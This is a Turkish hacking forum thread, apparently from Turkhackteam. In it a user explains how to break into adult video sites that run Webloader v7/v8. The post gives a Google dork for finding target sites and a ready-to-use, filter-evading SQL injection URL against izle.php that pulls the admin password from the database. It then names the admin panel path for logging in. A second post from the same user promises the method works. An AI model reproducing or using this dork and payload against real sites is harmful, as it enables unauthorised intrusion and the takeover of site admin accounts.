Adult İçerikli Siteleri Hacklemek İster Misiniz

Yuhbebune

Katılımcı Üye
23 Eki 2010
932
0
ankara
Webloader v7 ve v8 sürümü kullanan tüm siteleri (açıklı bulabildiğimiz) hacklemeyi anlatıyorum :)
Sql inj. açığıdır. Google da şu kelimeyi aratınız..

"Coded By Webloader" kelimesini aratarak webloader kullanan sitelere erişim sağlıyoruz.

Daha sonra girdiğiniz sitelere aşağıki kalın yazılarla belirttiğim alanı ekleyin. Bulabildiğiniz sitelerin admin panellerine oradaki şifreyi kullanarak giriş yapabilirsiniz.

siteadı.xxx/izle.php?vid=1'/**/uNIOn/**/aLl/**/sELEcT/**/0,1,2,GosTer,4,5,6,7,8,9,8,ayar/**/fROm/**/ayarlar/**/wHERe/**/ayar='SiFre

Admin paneli yolu:siteadı.com/admin.php

Anlatım bana aittir.

Son düzenleme:

Yuhbebune

Katılımcı Üye
23 Eki 2010
932
0
ankara
anlatım ve açık benim tarafımdan yapılmıştır açığı ben buldum daha önce bulan varmı bilmiorum link kısalmış yeniden verdim bir daha deneyin garanti bulursunuz..

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.